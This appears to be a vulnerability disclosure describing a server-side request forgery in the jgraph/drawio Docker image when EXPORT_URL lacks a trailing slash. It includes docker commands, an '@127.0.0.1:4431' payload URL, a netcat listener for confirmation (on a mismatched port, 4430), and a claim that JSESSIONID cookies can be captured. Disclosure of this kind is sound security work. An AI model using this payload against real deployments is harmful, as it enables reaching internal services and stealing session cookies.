The problem came from this line of code
I ran docker-drawio
with following command :
docker run -it --rm --name="draw" -e EXPORT_URL=http://somesite.com -p 8080:8080 -p 8443:8443 jgraph/drawio
if the drawio EXPORT_URL
is set to an address without any /
after the primary Hostname like http://somesite.com
( not like http://somesite.com/something
or http://somesite.com/
), then an attacker can send a request to 127.0.0.1:4431
with a payload like http://draio-instance/service/0/@127.0.0.1:4431
docker run -it --rm --name="draw" -e EXPORT_URL=http://google.com -p 8080:8080 -p 8443:8443 jgraph/drawio
and then docker ps
and get the drawio hash name ( called HN)docker exec -it HN /bin/bash
apt update && apt install netcat && netcat -l 4430
http://draio-instance:8080/service/0/@127.0.0.1:4431
it is a Full SSRF If you need another POC I can give you an HTTP logger script that returns some things to the attacker
Also, I don’t know what exactly is JSESSIONID
cookie? but I can receive its content in a My public IP after redirect too!